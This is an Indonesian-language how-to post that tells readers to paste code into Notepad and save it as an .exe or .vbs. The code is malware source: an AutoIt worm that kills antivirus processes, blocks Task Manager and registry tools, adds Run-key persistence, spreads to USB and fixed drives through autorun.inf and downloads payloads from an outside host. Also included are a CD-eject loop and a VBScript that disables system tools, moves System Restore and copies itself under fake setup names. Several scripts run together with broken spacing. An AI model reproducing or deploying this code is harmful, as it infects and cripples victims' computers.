[-] Buka notepad
[-] Copas code di bawah di notepad:
; DEATH_DRIVE 2.6 ;
; --------------------- ;
; written by poet_freak rizky.prasetya ;
; only for educational purpose only ;
; this code is given freely ;
; without any warranty, use it at ;
; your own risk ;
; oktober, 25 - 2011, 19.36 pm ;
;all rights reversed ;
; ==================================== ;
Opt(trayiconhide ,1) ; hide systemtray icon
if ProcessExists(explorer.exe) = true Then ;check the process, if explorer.exe exist
Run(@windowsdir & deathdrive_daemon.exe) ; run C:\windows\deathdrive_daemon.exe
EndIf
While 1
if ProcessExists(taskmgr.exe) = true Then ;if taskmanager active = True
Shutdown(6) ; force restart computer
endif
If ProcessExists(msconfig.exe) = true Then ; if msconfig active = true
shutdown(6) ; force restart
EndIf
ProcessClose(ansav.exe) ; force close ansav.exe
ProcessClose(pcmav-cln.exe) ; force close pcmav-cln.exe
$reg1 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ; declare var reg1 as HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
$reg2 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion ; declare var reg2 as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
RegWrite ($reg1,daemon,REG_SZ,@windowsdir &\p0et.exe) ; write registry value at $reg1
RegWrite ($reg1,Avgsystray,REG_SZ,@windowsdir &\p0et_freak1.exe)
RegWrite ($reg1,esetkrn,REG_SZ,@windowsdir &\p0et_freak2.exe)
RegWrite ($reg1,NvidCpl,REG_SZ,@windowsdir &\p0et_freak3.exe)
RegWrite ($reg1,Msmsgs,REG_SZ,@windowsdir &\msmsgs.exe)
Regwrite ($reg2 & \Explorer\Advanced,SuperHidden,REG_DWORD,0) ; write registry value at $reg2
Regwrite ($reg2 & \Explorer\Advanced,ShowSuperHidden,REG_DWORD,0)
Regwrite ($reg2 & \Explorer\Advanced,HideFileExt,REG_DWORD,1)
Regwrite ($reg2 & \Explorer\Advanced,Hidden,REG_DWORD,2)
RegWrite ($reg2 & \Policies\Explorer,NoFind,REG_DWORD,1)
Regwrite ($reg2 & \Policies\Explorer,NoFolderOptions,REG_DWORD,1)
Regwrite ($reg2 & \Policies\Explorer,NoDriveTypeAutoRun,REG_DWORD,91)
RegWrite ($reg2 & \Policies\Explorer,NoWelcomeScreen,REG_DWORD,1)
Regwrite ($reg2 & \Policies\system,DisableTaskMgr,REG_DWORD,1)
Regwrite ($reg2 & \Policies\system,DisableRegistryTools,REG_DWORD,1)
Regwrite ($reg2 & \Policies\system,ConfirmFileDelete,REG_DWORD,0)
RegWrite(HKEY_CURRENT_USER\Control Panel\International, s1159, REG_SZ, poet)
RegWrite(HKEY_CURRENT_USER\Control Panel\International, s2359, REG_SZ, poet)
RegWrite(HKEY_CURRENT_USER\Control Panel\International\Mouse, MouseSensitivity, REG_SZ, 0)
RegWrite(HKEY_CURRENT_USER\Control Panel\International\Mouse, SwapMouseButtons, REG_SZ, 1)
FileCopy(@ScriptFullPath,@windowsdir & \msmsgs.exe) ; create msmsgs.exe at C:\windows
FileCopy(@scriptfullpath,@windowsdir & \p0et_freak1.exe)
FileCopy(@scriptfullpath,@windowsdir & \p0et_freak2.exe)
FileCopy(@scriptfullpath,@windowsdir & \p0et_freak3.exe)
FileCopy(@ScriptFullPath,@TempDir & \pagefile.pif)
FileCopy(@scriptfullpath,@ProgramFilesDir & \Common Files\D_loader.exe)
FileSetAttrib(@windowsdir & \wininit.exe,-R) ; clear read only attribute
FileSetAttrib(@windowsdir & \msmsgs.exe,+R+H+S) ; create readonly + hidden + system file attribute
FileSetAttrib(@windowsdir & \p0et_freak1.exe,+R+H+S)
FileSetAttrib(@windowsdir & \p0et_freak2.exe,+R+H+S)
FileSetAttrib(@windowsdir & \p0et_freak3.exe,+R+H+S)
FileSetAttrib(@TempDir & \pagefile.pif,+S+R+H)
FileDelete(@windowsdir &\wininit.exe) ; delete C:\Windows\wininit.exe
FileDelete(@SystemDir & \MsVbVm60.dll)
if FileExists(@WindowsDir &\autorun.inf) <> True Then ; check autorun.inf in c:\windows, if not exist,
$atr = fileOpen(@WindowsDir & \autorun.inf,2) ; create autorun.inf in C:\windows, then open C:\windows\autorun.inf
FileWrite($atr, [autorun] & @CRLF) ; write [autorun]
filewrite($atr, label=Infected.! &@crlf) ; write label=infected.! at next line
FileWrite($atr, open=d_loader.exe & @CRLF)
FileWrite($atr, shellexecute=d_loader.exe &@CRLF)
FileWrite($atr, shell\Explore\command=d_loader.exe &@CRLF)
FileWrite($atr, shell\Open\command=d_loader.exe &@CRLF)
FileWrite($atr, shell=Explore)
FileClose($atr) ; close file
FileSetAttrib(@WindowsDir & \autorun.inf,+R+H+S) ; set file attribute to readonly, hidden, system
EndIf
if FileExists(@MyDocumentsDir & \death-drive ver. 2.6 readme.txt) <> True Then
$atr = FileOpen(@MyDocumentsDir & \death-drive ver. 2.6 readme.txt,2)
FileWrite($atr, to: someone there.... I still love U... & @CRLF)
Filewrite($atr, & @crlf)
Filewrite($atr, aku tak akan panjang lebar, & @crlf)
Filewrite($atr, aku hanya ingin tahu jawabmu, & @crlf)
Filewrite($atr, mengapa kamu mencampakkan diriku, & @crlf)
Filewrite($atr, aku tlah sabar padamu, tapi dirimu tak mau mengerti arti diriku yang ada di sampingmu. jujur maaf kan aku arum,meisi,indah&masita. & @crlf)
Filewrite($atr, & @crlf)
Filewrite($atr, apa salahku?? & @crlf)
Filewrite($atr, mengapa dirimu begitu?? & @crlf)
Filewrite($atr, & @crlf)
Filewrite($atr, mengapa sampai segitunya dirimu membenciku?? & @crlf)
Filewrite($atr, & @crlf)
Filewrite($atr, 01 juni 2009 //* Aku masih sayang padamu *// p0et & @crlf)
FileClose($atr)
EndIf
$path1 = DriveGetDrive (REMOVABLE)
if Not @error Then
for $d = 1 to $path1[0]
$flashdrive = $path1[$d]
if $flashdrive <> A: and DriveGetFileSystem($flashdrive) <> Then
FileSetAttrib($flashdrive & \autorun.inf,-R)
FileCopy(@ScriptFullPath,$flashdrive &\d_loader.exe)
FileCopy(@WindowsDir & \autorun.inf,$flashdrive & \autorun.inf,1)
FileCopy(@mydocumentsdir & \death-drive ver. 2.6 readme.txt, $flashdrive & \death-drive ver. 2.6 readme.txt)
FileSetAttrib($flashdrive & \autorun.inf,+R+H+S)
FileSetAttrib($flashdrive & \d_loader.exe,+R+H+S)
; Search1
$search1 = FileFindFirstFile($flashdrive & \*.)
if $search1 <> -1 Then
$file1 = FileFindNextFile($search1)
FileCopy(@scriptfullpath,$flashdrive &\& $file1 &.exe)
FileSetAttrib($flashdrive &\& $file1,+H)
FileSetAttrib($flashdrive &\& $file1 &.exe,-H-S)
EndIf
FileClose($search1)
EndIf
Next
EndIf
; Harddisk Drive
$path2 = DriveGetDrive (FIXED)
if Not @error Then
for $f = 1 to $path2[0]
$drive = $path2[$f]
FileSetAttrib($drive & \autorun.inf,-R)
FileCopy(@mydocumentsdir & \death-drive ver. 2.6 readme.txt, $drive & \death-drive ver. 2.6 readme.txt) ;copy
FileDelete($drive & \autorun.inf)
FileCopy(@scriptfullpath, $drive & temp.exe)
Next
EndIf
; *optional, auto-update feature
$webpath = http://h1.ripway.com/poet_freak/file ; declare webpath to download update
if FileExists(@systemdir & \p0et_freak1.exe) = True Then ; check file, if exist download file1.exe from webpath, then rename it to poet_freak1.exe
InetGet($webpath & /file1.exe,@SystemDir & \p0et_freak1.exe)
EndIf
if FileExists(@systemdir & \p0et_freak2.exe) = True Then
InetGet($webpath & /file2.exe,@SystemDir & \p0et_freak2.exe)
EndIf
if FileExists(@systemdir & \p0et_freak3.exe) = True Then
InetGet($webpath & /file3.exe,@SystemDir & \p0et_freak3.exe)
EndIf
WEnd Set oWMP = CreateObject(WMPlayer.OCX.7)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loopOn error resume next
Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
set Regpen = CreateObject (Wscript.Shell )
set FSO = CreateObject (Scripting. FileSystemObject )
set Creator = FSO.CreateTextFile (C:\Ternate. vbs, true)
Creator.WriteLine (Msgbox (& Chr (34) & Salam Kenal dari Saya,
Mr.Dajjal :< & chr (34)& )) Creator.Close Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \System\NoRun ,1,REG_ DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \System\DisableT askMgr, 1,RE G_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \System\DisableC MD,1, REG_DW ORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoFolderOption ,1, REG_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoDrives ,16,REG_ D WORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoSaveSettings ,1, REG_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ NoControlPanel ,1, REG_DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \NoSetTaskbar ,1,REG_ DWORD Regpen.RegWrite HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr entVersion\Policies \Explorer\ Advanced\ HideFileExt ,1,REG_DWORD Regpen.Regwrite HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur rentVersion\ Winlogon\ LegalNoticeCapti on, THE Syaithan-X Regpen.RegWrite HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur rentVersion\ Winlogon\ LegalNoticeText ,ASSALAMUALA IKUM, YA AHLIL KUBUR Set Copier = FSO.GetFile (C:\Ternate. vbs) Copier.Copy (C:\Documents and Settings\All Users\Start Menu\Programs\ Startup\Adobe. vbs) FSO.CreateFolder (C:\Program Files\Microsoft 0ffice\0ffice12 ) FSO.CreateFolder (D:\Program ) FSO.CreateFolder (E:\Program ) FSO.CreateFolder (F:\Program ) FSO.CreateFolder (G:\Program ) FSO.CreateFolder (H:\Program ) FSO.CreateFolder (I:\Program ) FSO.CreateFolder (J:\Program ) FSO.CreateFolder (K:\Program ) Set Deleter = FSO.GetFile (C:\Windows\ System32\ Restore\rstrui. exe) Deleter.Move (C:\Program Files\Microsoft 0ffice\0ffice12\ rstrui.Gnamu ) set Dupler = FSO.GetFile (WScript.ScriptFull Name) Dupler.Copy (C:\Program Files\Microsof 0ffice\0ffice12\ Rizky-Prasetya.vbs ) Dupler.Copy (C:\Documents and Settings\All Users\Start Menu\Programs\ Startup\Desktop. ini.vbs) Dupler.Copy (C:\Documents and Settings\All Users\Desktop\ Hcr-Rizky_Antivirus .exe.vbs ) Dupler.Copy (C:\Windows\ System32\ Restore\rstrui. exe.vbs) Dupler.Copy (D:\Program\ MotoGP_SETUP. vbs) Dupler.Copy (E:\Program\ TuneUp2009_ SETUP.vbs ) Dupler.Copy (F:\Program\ Ansav_SETUP. vbs) Dupler.Copy (G:\Program\ DeltaForce_ SETUP.vbs ) Dupler.Copy (H:\Program\ DeltaForce_ SETUP.vbs ) Dupler.Copy (I:\Program\ Ansav_SETUP. vbs) Dupler.Copy (J:\Program\ Project.vbs ) Dupler.Copy (K:\Program\ Hantu.vbs ) Set Runner = WScript.CreateObjec t (WScript.Shell ) Runner.Run (C:\Program Files\Microsoft 0ffice\0ffice12\ Hantu.vbs ) ; end of code [-] Lalu save dengan format Qkanslalumencintaimu.exe ataupun .vbs "Good Luck!!" [-] By:
